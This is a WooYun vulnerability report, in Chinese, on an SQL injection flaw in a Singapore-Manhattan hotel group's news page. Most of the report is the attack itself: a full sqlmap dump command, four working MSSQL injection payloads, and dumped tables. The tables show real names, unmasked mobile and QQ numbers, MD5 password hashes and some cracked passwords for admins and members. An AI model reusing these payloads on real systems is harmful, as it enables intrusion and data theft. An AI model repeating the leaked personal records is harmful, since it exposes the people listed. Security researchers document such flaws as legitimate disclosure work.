当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0152455

漏洞标题:新加坡曼哈顿酒店集团某处存在SQL注射漏洞(可泄露管理员与用户的真实姓名,密码,电话号码及邮箱地址)

相关厂商:新加坡曼哈顿酒店集团

漏洞作者: 路人甲

提交时间:2015-11-07 09:51

修复时间:2015-12-26 10:32

公开时间:2015-12-26 10:32

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-11-07: 细节已通知厂商并且等待厂商处理中
2015-11-11: 厂商已经确认,细节仅向厂商公开
2015-11-21: 细节向核心白帽子及相关领域专家公开
2015-12-01: 细节向普通白帽子公开
2015-12-11: 细节向实习白帽子公开
2015-12-26: 细节向公众公开

简要描述:

曼哈顿酒店隶属于深圳华威新桃园酒店管理有限公司,是著名的国际酒店投资管理机构,旗下拥有曼哈顿(Manhatton Hotel,五星,白金五星)、新桃园(Grand View Hotel,四星、五星) 、 曼思诺(Oncemore Hotel) 三大酒店品牌。管理公司在美国、新加坡、澳洲和中国大陆等地拥有十多家直营和托管、及建设筹备中的高端酒店。 曼哈顿酒店1992年进入中国大陆,将国际酒店管理理念和中国本土实际完美结合,全力培育成功了本土品牌“新桃园酒店(Grand View Hotel)”,并实现了多家新桃园酒店的投资运营,目前已运营的所有酒店年平均入住率都在95%以上;投资回报率连续多年在全国同业中名列前茅,被评为“中国十大最有投资价值酒店品牌”。
管理公司在中国大陆的发展将延续“国际水准,本土特色”的运营管理优势,曼哈顿不仅擅长国际化酒店的筹备运营和经营管理,也善于策划和管理大型豪华餐饮、夜总会、桑拿等;将国际酒店管理理念和中国酒店餐饮娱乐文化相结合,是曼哈顿酒店的独特优势,是绝大多数国内外连锁酒店品牌无法企及的。 2010年5月,公司决定加大亚太地区特别是大中华地区的战略投入,计划在中国大陆以每年新开20家酒店的发展速度进行战略扩张在5年内使旗下全球酒店总数超过120家,并于2015年前实现全球多点同步上市。

详细说明:

地址:http://**.**.**.**/news/detail.asp?ID=20150507171034

python sqlmap.py -u "http://**.**.**.**/news/detail.asp?ID=20150507171034" --random-agent -p ID --technique=BEST --batch -D dbmhghotel -T tb_Member -C LoginNum,MemberName,MemberPass,RealName,Mobile,Email --dump

漏洞证明:

---
Parameter: ID (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: ID=20150507171034' AND 3789=3789 AND 'Obve'='Obve
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: ID=20150507171034' AND 6204=CONVERT(INT,(SELECT CHAR(113)+CHAR(120)+CHAR(107)+CHAR(98)+CHAR(113)+(SELECT (CASE WHEN (6204=6204) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(118)+CHAR(106)+CHAR(118)+CHAR(113))) AND 'ZOsU'='ZOsU
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: ID=20150507171034';WAITFOR DELAY '0:0:5'--
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase OR time-based blind (heavy query)
    Payload: ID=20150507171034' OR 8112=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND 'esqv'='esqv
---
web server operating system: Windows 2008 or Vista
web application technology: ASP.NET, ASP, Microsoft IIS 7.0
back-end DBMS: Microsoft SQL Server 2008
current user:    'umhghotel'
current user is DBA:    False
database management system users [2]:
[*] sa
[*] umhghotel
database management system users password hashes:
[*] sa [1]:
    password hash: NULL
[*] umhghotel [1]:
    password hash: NULL


Database: dbmhghotel
Table: tb_Manager
[7 entries]
+----------+-------------------------------------------+-------------+----------+----------+----------------+-------------+
| UserName | Password                                  | Mobile      | QQ       | RealName | LastLoginIP    | ManageHotel |
+----------+-------------------------------------------+-------------+----------+----------+----------------+-------------+
| 前海国际     | 1dea8d2a2259608d7f06e4a5bd22c32c          | 13590105465 | <blank>  | 何经理      | **.**.**.** | 前岸国际酒店      |
| 人事部      | fb62579e990da4e2a8f15c3d1e123438 (987456) | 13682431842 | <blank>  | 王曼妮      | **.**.**.**  | all         |
| admin    | f01ee31f5202beb581e0d4ea10b156b7          | 13763207691 | 82804306 | 廖工       | **.**.**.**  | all         |
| 天津新桃园酒店  | 2212b0bea6336dc603a23165ca34607f          | 15822119480 | <blank>  | 翟丽娟      | **.**.**.** | tjxty       |
| 海岸新桃园酒店  | 2212b0bea6336dc603a23165ca34607f          | 18025385258 | <blank>  | 徐自霞      | **.**.**.**  | haiancheng  |
| 北海曼哈顿酒店  | a739c7d10e2b660157218061350ebc81          | 18677980065 | <blank>  | 黄敏智      | **.**.**.**  | bhmhd       |
| 集团人事部    | 202cb962ac59075b964b07152d234b70 (123)    | 86278999    | <blank>  | 叶慧       | **.**.**.**  | all         |
+----------+-------------------------------------------+-------------+----------+----------+----------------+-------------+


Database: dbmhghotel
Table: tb_Member
[17 entries]
+----------+-------------+-------------------------------------------+-----------------------+-------------+-----------------------------+
| LoginNum | MemberName  | MemberPass                                | RealName              | Mobile      | Email                       |
+----------+-------------+-------------------------------------------+-----------------------+-------------+-----------------------------+
| 0        | 12345678901 | cc70a619b89711714b89ff879a20c2f3          | 卓工                    | 18974408735 | cilizmm@**.**.**.**             |
| 2        | 13144848678 | 84bf49225fd66c0c88df3fbeef04a585          | 张蓝                    | 13144848678 | 32388736@**.**.**.**             |
| 1        | 13530777714 | 9bc1b2793bfec7ff8003c24325e54b0e          | 韩韩                    | 13530777714 | 1211426549@**.**.**.**           |
| 1        | 13602450995 | 956188e3b634849c26d4c45b0520d35e          | 刘丽虹                   | 13602450995 | <blank>                     |
| 0        | 13751025193 | 981ab0d4213ee0b2185cbb296c288809          | 陈时                    | 13751025193 | <blank>                     |
| 0        | 13763207691 | 51d5f04cb94058089f603ed710097b56          | 廖日南                   | 13763207691 | 82804306@**.**.**.**             |
| 4        | 13798211640 | e10adc3949ba59abbe56e057f20f883e (123456) | 刘洋                    | 13798211640 | <blank>                     |
| 1        | 13798588358 | 15c4c1efd92aad1d9f10b7e0508f7cad          | 陈正好                   | 13798588358 | <blank>                     |
| 6        | 13829202225 | 019faf63ddfc34212f4d2d01ce413b5c          | \\?8f\\?88景\\?81\\?ed | 13829202225 | <blank>                     |
| 0        | 13951799000 | 2d802b3f84156cd670ca33d337bb319b          | 黄融                    | 13951799000 | huangrong19871110@**.**.**.** |
| 18       | 18520807707 | 9d6742fd95f005e8672f306f4b30363d          | 郑比韩                   | 18520807707 | <blank>                     |
| 2        | 18974408715 | 9f9cf493b7eb46304599f8737604641f          | 李明                    | 18974408715 | 279305033@**.**.**.**           |
| 0        | 18974408785 | 8b89f06f7dab5d47b0fc4bad76596a05          | 测试                    | 18974408785 | 279305033@**.**.**.**           |
| 0        | 18974408795 | 40a03b93351203dabe90e89db8be0d8f          | 测试                    | 18974408795 | 279305033@**.**.**.**            |
| 23       | cilizmm     | e3ceb5881a0a1fdaad01296d7554868d (222222) | 卓明明                   | 18974408735 | cilizmm@**.**.**.**             |
| 13       | 安可馨         | e10adc3949ba59abbe56e057f20f883e (123456) | 安可馨                   | 13631635520 | 13631635520@**.**.**.**         |
| 0        | 郑先生         | e10adc3949ba59abbe56e057f20f883e (123456) | 郑先生                   | 13631635540 | 13631635540@**.**.**.**         |
+----------+-------------+-------------------------------------------+-----------------------+-------------+-----------------------------+

修复方案:

增加过滤。

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:7

确认时间:2015-11-11 10:31

厂商回复:

暂未建立与网站管理单位的直接处置渠道,待认领。

最新状态:

暂无

漏洞评价:

评价